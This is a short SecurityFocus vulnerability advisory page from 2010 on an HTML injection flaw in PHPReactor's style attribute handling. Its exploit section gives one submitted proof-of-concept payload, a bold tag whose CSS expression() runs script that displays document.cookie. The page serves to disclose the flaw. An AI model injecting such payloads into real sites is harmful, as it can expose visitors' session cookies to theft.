info
discussion
exploit
solution
references
PHPReactor Style Attribute HTML Injection Vulnerability
The following example was submitted:
<b style="expression(alert(document.cookie))">
Privacy Statement
Copyright 2010, SecurityFocus
